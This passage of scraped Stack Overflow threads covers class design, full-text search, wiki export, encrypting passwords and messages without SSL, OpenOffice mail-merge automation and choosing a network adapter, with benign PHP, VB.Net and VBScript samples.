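long childLeft  = parentLeft  + range / 3;   // inner third of the parent's range
long childRight = parentRight - range / 3;
// childLeft/childRight become the new node's bounds; its own children
// subdivide [childLeft, childRight] the same way on insert.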
A: If you're using SQL Server 2005 then this link explains how to retrieve hierarchical data.
Common Table Expressions (CTEs) can be your friends once you get comfortable using them.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38801",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "48"
} |
Q: Which class design is better? Which class design is better and why?
public class User
{
public String UserName;
public String Password;
public String FirstName;
public String LastName;
}
public class Employee : User
{
public String EmployeeId;
public String EmployeeCode;
public String DepartmentId;
}
public class Member : User
{
public String MemberId;
public String JoinDate;
public String ExpiryDate;
}
OR
public class User
{
public String UserId;
public String UserName;
public String Password;
public String FirstName;
public String LastName;
}
public class Employee
{
public User UserInfo;
public String EmployeeId;
public String EmployeeCode;
public String DepartmentId;
}
public class Member
{
public User UserInfo;
public String MemberId;
public String JoinDate;
public String ExpiryDate;
}
A: You can also think of Employee as a role of the User (Person). The role of a User can change in time (user can become unemployed) or User can have multiple roles at the same time.
Inheritance is much better when there is a real "is a" relation, for example Apple - Fruit. But be very careful: Circle - Ellipse is not a real "is a" relation, because a circle has less "freedom" than an ellipse (a circle is a state of an ellipse) - see: the Circle-Ellipse problem.
A: The question is simply answered by recognising that inheritance models an "IS-A" relationship, while membership models a "HAS-A" relationship.
*
*An employee IS A user
*An employee HAS A userinfo
Which one is correct? This is your answer.
A: The real questions are:
*
*What are the business rules and user stories behind a user?
*What are the business rules and user stories behind an employee?
*What are the business rules and user stories behind a member?
These can be three completely unrelated entities or not, and that will determine whether your first or second design will work, or if another completely different design is in order.
A: Neither one is good. Too much mutable state. You should not be able to construct an instance of a class that is in an invalid or partially initialized state.
That said, the second one is better because it favours composition over inheritance.
A: Stating your requirement/spec might help arrive at the 'best design'.
Your question is too 'subject-to-reader-interpretation' at the moment.
A: I don't like either one. What happens when someone is both a member and an employee?
A: Here's a scenario you should think about:
Composition (the 2nd example) is preferable if the same User can be both an Employee and a Member. Why? Because for two instances (Employee and Member) that represent the same User, if User data changes, you don't have to update it in two places. Only the User instance contains all the User information, and only it has to be updated. Since both Employee and Member classes contain the same User instance, they will automatically both contain the updated information.
A: Ask yourself the following:
*
*Do you want to model an Employee IS a User? If so, chose inheritance.
*Do you want to model an Employee HAS a User information? If so, use composition.
*Are virtual functions involved between the User (info) and the Employee? If so, use inheritance.
*Can an Employee have multiple instances of User (info)? If so, use composition.
*Does it make sense to assign an Employee object to a User (info) object? If so, use inheritance.
In general, strive to model the reality your program simulates, under the constraints of code complexity and required efficiency.
A: Nice question although to avoid distractions about right and wrong I'd consider asking for the pros and cons of each approach -- I think that's what you meant by which is better or worse and why. Anyway ....
The First Approach aka Inheritance
Pros:
*
*Allows polymorphic behavior.
*Is initially simple and convenient.
Cons:
*
*May become complex or clumsy over time if more behavior and relations are added.
The Second Approach aka Composition
Pros:
*
*Maps well to non-OOP scenarios like relational tables, structured programming, etc
*Is straightforward (if not necessarily convenient) to incrementally extend relations and behavior.
Cons:
*
*No polymorphism therefore it's less convenient to use related information and behavior
Lists like these + the questions Jon Limjap mentioned will help you make decisions and get started -- then you can find what the right answers should have been ;-)
A: I don't think composition is always better than inheritance (just usually). If Employee and Member really are Users, and they are mutually exclusive, then the first design is better. Consider the scenario where you need to access the UserName of an Employee. Using the second design you would have:
myEmployee.UserInfo.UserName
which is bad (law of Demeter), so you would refactor to:
myEmployee.UserName
which requires a small method on Employee to delegate to the User object. All of which is avoided by the first design.
A: Three more options:
*
*Have the User class contain the supplemental information for both employees and members, with unused fields blank (the ID of a particular User would indicate whether the user was an employee, member, both, or whatever).
*Have an User class which contains a reference to an ISupplementalInfo, where ISupplementalInfo is inherited by ISupplementalEmployeeInfo, ISupplementalMemberInfo, etc. Code which is applicable to all users could work with User class objects, and code which had a User reference could get access to a user's supplemental information, but this approach would avoid having to change User if different combinations of supplemental information are required in future.
*As above, but have the User class contain some kind of collection of ISupplementalInfo. This approach would have the advantage of facilitating the run-time addition of properties to a user (e.g. because a Member got hired). When using the previous approach, one would have to define different classes for different combinations of properties; turning a "member" into a "member+customer" would require different code from turning an "employee" into an "employee+customer". The disadvantage of the latter approach is that it would make it harder to guard against redundant or inconsistent attributes (using something like a Dictionary<Type, ISupplementalInfo> to hold supplemental information could work, but would seem a little "bulky").
I would tend to favor the second approach, in that it allows for future expansion better than would direct inheritance. Working with a collection of objects rather than a single object might be slightly burdensome, but that approach may be better able than the others to handle changing requirements.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38820",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "45"
} |
Q: Best full text search alternative to MS SQL, C++ solution What is the best full text search alternative to Microsoft SQL? (which works with MS SQL)
I'm looking for something similar to Lucene and Lucene.NET but without the .NET and Java requirements. I would also like to find a solution that is usable in commercial applications.
A: Sphinx is one of the best solutions. It's written in C++ and has amazing performance.
A: Take a look at CLucene - It's a well maintained C++ port of java Lucene. It's currently licenced under LGPL and we use it in our commercial application.
Performance is incredible, however you do have to get your head around some of the strange API conventions.
A: DT Search is hands down the best search tool I have used. They have a number of solutions available. Their engine will run on native Win32, Linux or .NET. It will index pretty much every kind of document you might have (Excel, PDF, Word, etc.). I did some benchmark comparisons a while ago and it was the easiest to use and had the best performance.
A: Solr is based on Lucene, but accessible via HTTP, so it can be used from any platform.
A: I second Sphinx, but Lucene is also not so bad despite the Java. :) If you are not dealing with too much data spread out etc., then also look into MySQL's FULLTEXT. We are using it to search across a 20 GB database.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38822",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "4"
} |
Q: Is Wiki Content Portable? I'm thinking of starting a wiki, probably on a low cost LAMP hosting account. I'd like the option of exporting my content later in case I want to run it on IIS/ASP.NET down the line. I know in the weblog world, there's an open standard called BlogML which will let you export your blog content to an XML based format on one site and import it into another. Is there something similar with wikis?
A: The correct answer is ... "it depends".
It depends on which wiki you're using or planning to use. I've used various over the years. MoinMoin was OK, used files rather than a database, and Ubuntu seems to like it. MediaWiki everyone knows about, and JAMWiki is a Java clone(ish) of MediaWiki with the aim to be markup compatible with MediaWiki; both use databases and you can generally connect whichever database you want, while JAMWiki is pre-configured to use an internal HSQLDB instance.
I recently converted about 80 pages from a MoinMoin wiki into JAMWiki pages and this was probably 90% handled by a tiny perl script I found somewhere (I'll provide a link if I can find it again). The other 10% was unfortunately a by-hand experience (they were of the utmost importance, being recipes for the missus) ;-)
I also recently setup a Mediawiki instance for work and that took all of about 8 minutes to do. So that'd be my choice.
A: To answer your question I don't believe that there's such a standard as WikiML as Till called it.
As strange as it sounds, I've investigated screen scraping a wiki for a co-worker to help him port it to another wiki engine. It turned out that screen scraping would have been easier, quicker and more efficient to write to move this particular file based wiki to another one or a CMS.
Given the context that you wrote the question in, I would bite the bullet now and pay the little extra for a Windows hosted account and put ScrewTurn Wiki on it. You've got the option of using a file based or SQL Server based back end for it, but because one of your requirements is low cost I'm guessing that you would use file based now for a cheaper hosted account, and then you can always upscale the back end to SQL Server.
A: I haven't heard of WikiML.
I think your biggest obstacle is gonna be converting one wiki markup to another. For example, some wikis use markdown (which is what Stack Overflow uses), others use another markup syntax (e.g. BBCode, ...), etc.. The bottom line is - assuming the contents are databased it's not impossible to export and parse it to make it "fit" in another system. It might just be a pain in the ass.
And if the contents are not databased, it's gonna be a royal pain in the ass. :D
Another solution would be to stay with the same system. I am not sure what the reason is for changing the technology later on. It's not like a growing project requires IIS/ASP.NET all of a sudden. (It might just be the other way around.) But for example, if you could stick with PHP for a while, you could also run that on IIS.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38824",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "7"
} |
Q: Two-way password encryption without ssl I am using the basic-auth twitter API (no longer available) to integrate twitter with my blog's commenting system. The problem with this and many other web APIs out there is that they require the user's username and password to do anything useful. I don't want to deal with the hassle and cost of installing a SSL certificate, but I also don't want passwords passed over the wire in clear text.
I guess my general question is: How can I send sensitive data over an insecure channel?
This is my current solution and I'd like to know if there are any holes in it:
*
*Generate a random key on the server (I'm using php).
*Save the key in a session and also output the key in a javascript variable.
*On form submit, use Triple DES in javascript with the key to encrypt the password.
*On the server, decrypt the password using the key from the session and then destroy the session.
The end result is that only the encrypted password is sent over the wire and the key is only used once and never sent with the password. Problem solved?
A: You don't have to have a certificate on your server; it's up to the client whether they are willing to talk to an unauthenticated server. Key agreement can still be performed to establish a private channel. It wouldn't be safe to send private credentials to an unauthenticated server though, which is why you don't see SSL used this way in practice.
To answer your general question: you just send it. I think your real general question is: “How do I send sensitive data over an insecure channel—and keep it secure?” You can't.
It sounds like you've decided that security isn't worth the $10–20 per month a certificate would cost, and to protect Twitter passwords, that's probably true. So, why spend time to provide the illusion of security? Just make it clear to your users that their password will be sent in the clear and let them make their own choice.
A:
*
*Generate a random key on the server (I'm using php).
*Save the key in a session and also output the key in a javascript variable.
*On form submit, use Triple DES in javascript with the key to encrypt the password.
This avoids sending the password in the clear over the wire, but it requires you to send the key in the clear over the wire, which would allow anyone eavesdropping to decode the password.
It's been said before and I'll say it again: don't try to make up your own cryptographic protocols! There are established protocols out there for this kind of thing that have been created, peer reviewed, beat on, hacked on, poked and prodded by professionals, use them! No one person is going to be able to come up with something better than the entire cryptographic and security community working together.
A: So how is this any more secure? Even though you might have secured browser<>your server, what about the rest of the Internet (your server<>twitter)?
IMHO, it's unacceptable to ask for a username and password of another service and expect people to enter that. And if you care that much - don't integrate them until they get their act straight and re-enable OAuth. (They supported it for a while, but disabled it a few months ago.)
In the mean time, why not offer OpenID? Every Google, Yahoo!, VOX etc. account has one. People might not be aware of it but chances are really, really high that they already have OpenID. Check this list to see what I mean.
A: When the key is sent between the client and the server it is clear text and subject to interception. Combine that with the encrypted text of the password and the password is decrypted.
Diffie-Hellman is a good solution. If you only need to authenticate them, and not actually transmit the password (because the password is already stored on the server), then you can use HTTP Digest Authentication, or some variation thereof.
A: APIs and OAuth
Firstly, as others have said, you shouldn't be using a user's password to access the API, you should be getting an OAuth token. This will allow you to act on that user's behalf without needing their password. This is a common approach used by many APIs.
Key Exchange
If you need to solve the more general problem of exchanging information over insecure connections, there are several key exchange protocols as mentioned by other answers.
In general key exchange algorithms are secure from eavesdroppers, but because they do not authenticate the identity of the users, they are vulnerable to man-in-the-middle attacks.
From the Wikipedia page on Diffie Hellman:
In the original description, the
Diffie–Hellman exchange by itself does not provide authentication of
the communicating parties and is thus vulnerable to a
man-in-the-middle attack. A person in the middle may establish two
distinct Diffie–Hellman key exchanges, one with Alice and the other
with Bob, effectively masquerading as Alice to Bob, and vice versa,
allowing the attacker to decrypt (and read or store) then re-encrypt
the messages passed between them. A method to authenticate the
communicating parties to each other is generally needed to prevent
this type of attack. Variants of Diffie-Hellman, such as STS, may be
used instead to avoid these types of attacks.
Even STS is insecure in some cases where an attacker is able to insert their own identity (signing key) in place of either the sender or receiver.
Identity and Authentication
This is exactly the problem SSL is designed to solve. By establishing a hierarchy of 'trusted' signing authorities which have in theory verified who owns a domain name, someone connecting to a website can verify that they are indeed communicating with that domain's server, and not with a man-in-the-middle who has placed themselves in between.
You can create a self-signed certificate which will provide the necessary configuration to encrypt the connection, but will not protect you from man in the middle attacks for the same reason that unauthenticated Diffie-Hellman key exchange will not.
You can get free SSL certificates valid for 1 year from https://www.startssl.com/ - I use them for my personal sites. They're not quite as 'trusted' whatever that means, since they only do automatic checks on people who apply for one, but it's free. There are also services which cost very little (£10/year from 123-Reg in the UK).
A: Your method has a flaw - if someone were to intercept the transmission of the key to the user and the user's encrypted reply they could decrypt the reply and obtain the username/password of the user.
However, there is a way to securely send information over an insecure medium, so long as the information cannot be modified in transit, known as the Diffie-Hellman key exchange. Basically, the two parties are able to compute a shared key used to encrypt the data based on the messages they exchange - yet an observer of those messages does not have enough information to deduce the key.
Setting up the conversation between the client and the server can be tricky though, and much more time consuming than simply applying SSL to your site. You don't even have to pay for it - you can generate a self-signed certificate that provides the necessary encryption. This won't protect against man-in-the-middle attacks, but neither will the Diffie-Hellman algorithm.
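To make the Diffie-Hellman idea concrete, here is a toy sketch in PHP using the GMP extension. The numbers are deliberately tiny and the private values are hardcoded, so this is purely an illustration of the arithmetic, not something to deploy; real implementations use large safe primes, random private values, and a vetted library.
<?php
// Toy Diffie-Hellman, for illustration only.
$p = gmp_init(23);  // public prime modulus (far too small for real use)
$g = gmp_init(5);   // public generator

$a = gmp_init(6);   // Alice's private value (should be large and random)
$b = gmp_init(15);  // Bob's private value

$A = gmp_powm($g, $a, $p);  // Alice sends A = g^a mod p over the wire
$B = gmp_powm($g, $b, $p);  // Bob sends B = g^b mod p over the wire

$aliceShared = gmp_powm($B, $a, $p);  // (g^b)^a mod p
$bobShared   = gmp_powm($A, $b, $p);  // (g^a)^b mod p

// Both ends arrive at the same shared secret without ever transmitting it.
echo gmp_strval($aliceShared) . ' == ' . gmp_strval($bobShared) . PHP_EOL;
?>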
A: I've implemented a different approach
*
*Server: user name and password-hash stored in the database
*Server: send a challenge with the form to request the password, store it in the session with a timestamp and the client's IP address
*Client: hash the password, concat challenge|username|passwordhash, hash it again and post it to the server
*Server: verify timestamp, IP, do the same concatenation/hashing and compare it
This applies to a password transmission. Using it for data means using the final hash as the encryption key for the plain text and generating a random initialization vector transmitted with the cipher text to the server.
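To illustrate step 4, here is a rough server-side sketch in PHP (7+). The field names, the hash choice (SHA-256) and the lookupPasswordHash() helper are my own assumptions for the example, not part of the scheme itself:
<?php
session_start();

$valid = false;
if (isset($_SESSION['challenge'], $_SESSION['challenge_time'], $_SESSION['challenge_ip'])) {
    $fresh  = (time() - $_SESSION['challenge_time']) < 300;   // challenge valid for 5 minutes
    $sameIp = $_SESSION['challenge_ip'] === $_SERVER['REMOTE_ADDR'];

    $username = $_POST['username'] ?? '';
    $response = $_POST['response'] ?? '';   // hash(challenge|username|passwordhash) computed client-side

    $storedHash = lookupPasswordHash($username);   // hypothetical DB lookup of the stored password hash
    if ($storedHash !== null) {
        $expected = hash('sha256', $_SESSION['challenge'] . '|' . $username . '|' . $storedHash);
        $valid = $fresh && $sameIp && hash_equals($expected, $response);
    }
}

// The challenge is single-use, so discard it regardless of the outcome.
unset($_SESSION['challenge'], $_SESSION['challenge_time'], $_SESSION['challenge_ip']);

echo $valid ? 'authenticated' : 'rejected';
?>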
Any comments on this?
A: The problem with client-side javascript security is that the attacker can modify the javascript in transit to a simple {return input;} thereby rendering your elaborate security moot. Solution: use browser-provided (ie. not transmitted) RSA. From what I know, not available yet.
A:
How can I send sensitive data over an
insecure channel
With a pre-shared secret key. This is what you attempt in your suggested solution, but you can't send that key over the insecure channel. Someone mentioned DH, which will help you negotiate a key. But the other part of what SSL does is provide authentication, to prevent man-in-the-middle attacks so that the client knows they are negotiating a key with the person they intend to communicate with.
Chris Upchurch's advice is really the only good answer there is for 99.99% of engineers - don't do it. Let someone else do it and use their solution (like the guys who wrote the SSL client/server).
I think the ideal solution here would be to get Twitter to support OpenID and then use that.
A: An ssl certificate that is self-signed doesn't cost money. For a free twitter service, that is probably just fine for users.
A: To Oli (regarding the challenge/hash approach above):
In that approach, suppose I'm on the same subnet, behind the same router, as a colleague at work, so we share the same external IP. I open the same URL in my browser, so the server generates a challenge tied to that IP; then I use a TCP/IP dump to sniff the hashed or non-hashed password from my colleague's connection. I can sniff everything he sends, so I have all the hashes from his form, plus a still-valid timestamp and the same IP. I send it all again using a POST tool and hey, I'm logged in.
A: If you don't want to use SSL, why not try some other protocol, such as kerberos?
A basic overview is here:
http://www.kerberos.org/software/tutorial.html
Or if you want to go somewhat more in depth, see
http://www.hitmill.com/computers/kerberos.html
A: I have a similar issue (wanting to encrypt data in forms without paying for an SSL certificate), so I did some hunting and found this project: http://www.jcryption.org/
I haven't used it yet, but it looks easy to implement, and I thought I'd share it here in case anyone else is looking for something like it and finds themselves on this page like I did.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38838",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "14"
} |
Q: How to do a simple mail merge in OpenOffice I need to do a simple mail merge in OpenOffice using C++, VBScript, VB.Net or C# via OLE or native API. Are there any good examples available?
A: I haven't come up with a solution I'm really happy with but here are some notes:
*
*Q. What is the OO API for mail merge?
A. http://api.openoffice.org/docs/common/ref/com/sun/star/text/MailMerge.html
*Q. What support groups?
A. http://user.services.openoffice.org/en/forum/viewforum.php?f=20
*Q. Sample code?
A. http://user.services.openoffice.org/en/forum/viewtopic.php?f=20&t=946&p=3778&hilit=mail+merge#p3778
http://user.services.openoffice.org/en/forum/viewtopic.php?f=20&t=8088&p=38017&hilit=mail+merge#p38017
*Q. Any more examples?
A. file:///C:/Program%20Files/OpenOffice.org_2.4_SDK/examples/examples.html (comes with the SDK)
http://www.oooforum.org/forum/viewtopic.phtml?p=94970
*Q. How do I build the examples?
A. e.g., for WriterDemo (C:\Program Files\OpenOffice.org_2.4_SDK\examples\CLI\VB.NET\WriterDemo)
*
*Add references to everything in here: C:\Program Files\OpenOffice.org 2.4\program\assembly
*That is cli_basetypes, cli_cppuhelper, cli_types, cli_ure
*Q. Does OO use the same separate data/document file for mail merge?
A. It allows for a range of data sources including csv files
*Q. Does OO allow you to merge to all the different types (fax, email, new document printer)?
A. You can merge to a new document, print and email
*Q. Can you add custom fields?
A. Yes
*Q. How do you create a new document in VB.Net?
A.
Dim xContext As XComponentContext
xContext = Bootstrap.bootstrap()
Dim xFactory As XMultiServiceFactory
xFactory = DirectCast(xContext.getServiceManager(), _
XMultiServiceFactory)
'Create the Desktop
Dim xDesktop As unoidl.com.sun.star.frame.XDesktop
xDesktop = DirectCast(xFactory.createInstance("com.sun.star.frame.Desktop"), _
unoidl.com.sun.star.frame.XDesktop)
'Open a new empty writer document
Dim xComponentLoader As unoidl.com.sun.star.frame.XComponentLoader
xComponentLoader = DirectCast(xDesktop, unoidl.com.sun.star.frame.XComponentLoader)
Dim arProps() As unoidl.com.sun.star.beans.PropertyValue = _
New unoidl.com.sun.star.beans.PropertyValue() {}
Dim xComponent As unoidl.com.sun.star.lang.XComponent
xComponent = xComponentLoader.loadComponentFromURL( _
"private:factory/swriter", "_blank", 0, arProps)
Dim xTextDocument As unoidl.com.sun.star.text.XTextDocument
xTextDocument = DirectCast(xComponent, unoidl.com.sun.star.text.XTextDocument)
*Q. How do you save the document?
A.
Dim storer As unoidl.com.sun.star.frame.XStorable = DirectCast(xTextDocument, unoidl.com.sun.star.frame.XStorable)
arProps = New unoidl.com.sun.star.beans.PropertyValue() {}
storer.storeToURL("file:///C:/Users/me/Desktop/OpenOffice Investigation/saved doc.odt", arProps)
*Q. How do you Open the document?
A.
Dim xComponent As unoidl.com.sun.star.lang.XComponent
xComponent = xComponentLoader.loadComponentFromURL( _
"file:///C:/Users/me/Desktop/OpenOffice Investigation/saved doc.odt", "_blank", 0, arProps)
*Q. How do you initiate a mail merge in VB.Net?
A.
*
*Don't know. This functionality is in the API reference but is missing from the IDL. We may be slightly screwed. Assuming the API was working, it looks like running a merge is fairly simple.
*In VBScript:
Set objServiceManager = WScript.CreateObject("com.sun.star.ServiceManager")
'Now set up a new MailMerge using the settings extracted from that doc
Set oMailMerge = objServiceManager.createInstance("com.sun.star.text.MailMerge")
oMailMerge.DocumentURL = "file:///C:/Users/me/Desktop/OpenOffice Investigation/mail merged.odt"
oMailMerge.DataSourceName = "adds"
oMailMerge.CommandType = 0 ' http://api.openoffice.org/docs/common/ref/com/sun/star/text/MailMerge.html#CommandType
oMailMerge.Command = "adds"
oMailMerge.OutputType = 2 ' http://api.openoffice.org/docs/common/ref/com/sun/star/text/MailMerge.html#OutputType
oMailMerge.execute(Array())
*In VB.Net (Option Strict Off)
Dim t_OOo As Type
t_OOo = Type.GetTypeFromProgID("com.sun.star.ServiceManager")
Dim objServiceManager As Object
objServiceManager = System.Activator.CreateInstance(t_OOo)
Dim oMailMerge As Object
oMailMerge = t_OOo.InvokeMember("createInstance", _
BindingFlags.InvokeMethod, Nothing, _
objServiceManager, New [Object]() {"com.sun.star.text.MailMerge"})
'Now set up a new MailMerge using the settings extracted from that doc
oMailMerge.DocumentURL = "file:///C:/Users/me/Desktop/OpenOffice Investigation/mail merged.odt"
oMailMerge.DataSourceName = "adds"
oMailMerge.CommandType = 0 ' http://api.openoffice.org/docs/common/ref/com/sun/star/text/MailMerge.html#CommandType
oMailMerge.Command = "adds"
oMailMerge.OutputType = 2 ' http://api.openoffice.org/docs/common/ref/com/sun/star/text/MailMerge.html#OutputType
oMailMerge.execute(New [Object]() {})
*The same thing but with Option Strict On (doesn't work)
Dim t_OOo As Type
t_OOo = Type.GetTypeFromProgID("com.sun.star.ServiceManager")
Dim objServiceManager As Object
objServiceManager = System.Activator.CreateInstance(t_OOo)
Dim oMailMerge As Object
oMailMerge = t_OOo.InvokeMember("createInstance", _
BindingFlags.InvokeMethod, Nothing, _
objServiceManager, New [Object]() {"com.sun.star.text.MailMerge"})
'Now set up a new MailMerge using the settings extracted from that doc
oMailMerge.GetType().InvokeMember("DocumentURL", BindingFlags.SetProperty, Nothing, oMailMerge, New [Object]() {"file:///C:/Users/me/Desktop/OpenOffice Investigation/mail merged.odt"})
oMailMerge.GetType().InvokeMember("DataSourceName", BindingFlags.SetProperty, Nothing, oMailMerge, New [Object]() {"adds"})
oMailMerge.GetType().InvokeMember("CommandType", BindingFlags.SetProperty, Nothing, oMailMerge, New [Object]() {0})
oMailMerge.GetType().InvokeMember("Command", BindingFlags.SetProperty, Nothing, oMailMerge, New [Object]() {"adds"})
oMailMerge.GetType().InvokeMember("OutputType", BindingFlags.SetProperty, Nothing, oMailMerge, New [Object]() {2})
oMailMerge.GetType().InvokeMember("Execute", BindingFlags.InvokeMethod Or BindingFlags.IgnoreReturn, Nothing, oMailMerge, New [Object]() {}) ' this line fails with a type mismatch error
A: You should take a look at the Apache OpenOffice API, a project for creating an API for OpenOffice. Among the languages it is said to support are C++, Java, Python, CLI, StarBasic, JavaScript and OLE.
Java Example of a mailmerge in OpenOffice.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38842",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "4"
} |
Q: How to encrypt one message for multiple recipients? What are the fundamentals to accomplish data encryption with exactly two keys (which could be password-based), but needing only one (either one) of the two keys to decrypt the data?
For example, data is encrypted with a user's password and his company's password, and then he or his company can decrypt the data. Neither of them know the other password. Only one copy of the encrypted data is stored.
I don't mean public/private key. Probably via symmetric key cryptography and maybe it involves something like XORing the keys together to use them for encrypting.
Update: I would also like to find a solution that does not involve storing the keys at all.
A: Generally speaking, what you do is encrypt the data with a randomly generated key, and then append versions of that random key that have been encrypted with every known key. So anybody with a valid key can discover the 'real' key that was used to encrypt the data.
A: The way this is customarily done is to generate a single symmetric key to encrypt the data. Then you encrypt the symmetric key with each recipient's key or password to that they can decrypt it on their own. S/MIME (actually the Cryptographic Message Syntax on which S/MIME is based) uses this technique.
This way, you only have to store one copy of the encrypted message, but multiple copies of its key.
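As a rough illustration of that pattern in PHP (7+) with passwords rather than recipient certificates, here is a sketch; the cipher choices, the PBKDF2 parameters, and the lack of error handling and message authentication are all simplifications for the example:
<?php
$data = 'the secret document';

// One random content-encryption key for the data itself.
$dataKey    = random_bytes(32);
$dataIv     = random_bytes(16);
$cipherText = openssl_encrypt($data, 'aes-256-cbc', $dataKey, OPENSSL_RAW_DATA, $dataIv);

// Wrap (encrypt) the data key separately under each recipient's password.
function wrapKey($dataKey, $password) {
    $salt    = random_bytes(16);
    $kek     = hash_pbkdf2('sha256', $password, $salt, 100000, 32, true); // key-encryption key
    $iv      = random_bytes(16);
    $wrapped = openssl_encrypt($dataKey, 'aes-256-cbc', $kek, OPENSSL_RAW_DATA, $iv);
    return array('salt' => $salt, 'iv' => $iv, 'wrapped' => $wrapped);
}

// Store one copy of the encrypted data plus one wrapped key per recipient.
$stored = array(
    'iv'         => $dataIv,
    'ciphertext' => $cipherText,
    'keys'       => array(
        'user'    => wrapKey($dataKey, 'users-password'),
        'company' => wrapKey($dataKey, 'companys-password'),
    ),
);

// Either party unwraps the data key with their own password, then decrypts the data.
$k   = $stored['keys']['user'];
$kek = hash_pbkdf2('sha256', 'users-password', $k['salt'], 100000, 32, true);
$dataKeyAgain = openssl_decrypt($k['wrapped'], 'aes-256-cbc', $kek, OPENSSL_RAW_DATA, $k['iv']);
echo openssl_decrypt($stored['ciphertext'], 'aes-256-cbc', $dataKeyAgain, OPENSSL_RAW_DATA, $stored['iv']);
?>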
A: If I understood you correctly, you have some data that you want to encrypt, and you want to distribute the encryption key split into n 'key pieces' (in your case, 2 pieces).
For that you could use the XOR based splitting, here is how it works:
You provide the required number of pieces, n, and the secret key, K. To generate the n pieces of your key, you need to create (n − 1) random values: R1, R2, R3, . . . , Rn−1. For that you can use a SecureRandom generator (or your platform's equivalent), which will help avoid duplicates. Then you XOR these n − 1 pieces with your key K:
Rn = R1 ⊕ R2 ⊕ R3 ⊕ . . . ⊕ Rn−1 ⊕ K
Now you have your n pieces: R1, R2, R3, …, Rn−1, Rn, and you may destroy K. Those pieces can be spread in your code or sent to users.
To reassemble the key, we XOR the n pieces together:
K = R1 ⊕ R2 ⊕ R3 ⊕ . . . ⊕ Rn−1 ⊕ Rn
With the XOR function (⊕) each piece is inherently important in the reconstruction of the key, if any bits in any of the pieces are changed, then the key is not recoverable.
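Here is a minimal sketch of this splitting scheme in PHP rather than Java (illustrative only; it assumes every piece has the same length as the key and relies on PHP's byte-wise string XOR operator):
<?php
// Split a key K into n pieces such that all n are needed to recover it.
function splitKey($key, $n) {
    $pieces = array();
    $xorOfRandoms = str_repeat("\0", strlen($key));
    for ($i = 0; $i < $n - 1; $i++) {
        $r = random_bytes(strlen($key));   // R1 .. Rn-1
        $pieces[] = $r;
        $xorOfRandoms = $xorOfRandoms ^ $r;
    }
    $pieces[] = $xorOfRandoms ^ $key;      // Rn = R1 xor ... xor Rn-1 xor K
    return $pieces;
}

// Recover K by XORing all the pieces back together.
function joinKey(array $pieces) {
    $key = str_repeat("\0", strlen($pieces[0]));
    foreach ($pieces as $p) {
        $key = $key ^ $p;
    }
    return $key;
}

$key    = random_bytes(32);           // the secret key K
$pieces = splitKey($key, 3);          // hand one piece to each party
var_dump(joinKey($pieces) === $key);  // bool(true)
?>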
For more info and code, you can take a look at the Android Utility I wrote for that purpose:
GitHub Project: https://github.com/aivarsda/Secret-Key-Split-Util
Also you can try the Secret Key Splitter demo app which uses that Utility :
GooglePlay: https://play.google.com/store/apps/details?id=com.aivarsda.keysplitter
A: I think I thought of a solution that would work:
D = data to encrypt
h1 = hash(userpassword)
h2 = hash(companyPassword)
k = h1 concat h2
E = function to encrypt
//C is the encrypted data
C = E_h1(h2) concat E_h2(h1) concat E_k(D)
Then either person can decrypt the hash of the other person, and then combine them to decrypt the rest of the data.
Perhaps there is a better solution than this though?
A: In the more general case, a secret (in this application, a decryption key for the data) can be split into shares such that some threshold number of these shares is required to recover the secret. This is known as secret sharing or with n shares and a threshold of t, a (t,n)-threshold scheme.
One way this can be done is by creating a polynomial of order t-1, setting the secret as the first coefficient, and choosing the rest of the coefficients at random. Then, n random points on this curve are selected and become the shares.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38846",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "9"
} |
Q: Will this hardware be 64bit Windows Server 2008 compatible? I recently printed out Jeff Atwood's Understanding The Hardware blog post and plan on taking it to Fry's Electronics and saying to them "Give me all the parts on these sheets so I can put this together." However, I'm going to be installing 64bit Windows Server 2008 on this machine so before I get all the parts:
Will all this hardware be 64bit Server 2008 compatible? - i.e. all drivers available for this hardware for this OS?
A: Hardware's generally pretty OS-agnostic (at least in terms of Windows flavors) these days. Your only concern is getting drivers for other devices (scanners, printers, IR remotes) that won't work on 64bit and/or won't work on "Server" OSes. Online backup software like Mozy generally won't even install on a Server OS, so it depends on what you're going to use it for.
That said, if you're just going to use it for a home machine, then without even looking at the hardware list Jeff put together, I'd be confident in saying it'll probably work just fine.
A: Yes, all that stuff should be fine (motherboard and CPU hardware, motherboard drivers, video card drivers).
A: You have a $1000 operating system license and you're going to put it on ~$1100 worth of hardware purchased at Fry's and presumably put together by yourself?
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38861",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "0"
} |
Q: How do you find out which NIC is connected to the internet? Consider the following setup:
A windows PC with a LAN interface and a WiFi interface (the standard for any new laptop). Each of the interfaces might be connected or disconnected from a network. I need a way to determine which one of the adapters is the one connected to the internet - specifically, in case they are both connected to different networks, one with connection to the internet and one without.
My current solution involves using IPHelper's "GetBestInterface" function and supplying it with the IP address "0.0.0.0".
Do you have any other solutions you might suggest to this problem?
Following some of the answers, let me elaborate:
*
*I need this because I have a product that has to choose which adapter to bind to. I have no way of controlling the setup of the network or the host where the product will run and so I need a solution that is as robust as possible, with as few assumptions as possible.
*I need to do this in code, since this is part of a product.
@Chris Upchurch: This makes me dependent on google.com being up (usually not a problem) and on any personal firewall that might be installed to allow pinging.
@Till: Like Steve Moon said, relying on the adapter's address is kind of risky because you make a lot of assumptions on the internal network setup.
@Steve Moon: Looking at the routing table sounds like a good idea, but instead of applying the routing logic myself, I am trying to use "GetBestInterface" as described above. I believe what it should do is exactly what you outlined in your answer, but I am not really sure. The reason I'm reluctant to implement my own "routing logic" is that there's a better chance that I'll get it wrong than if I use a library/API written and tested by more "hard-core" network people.
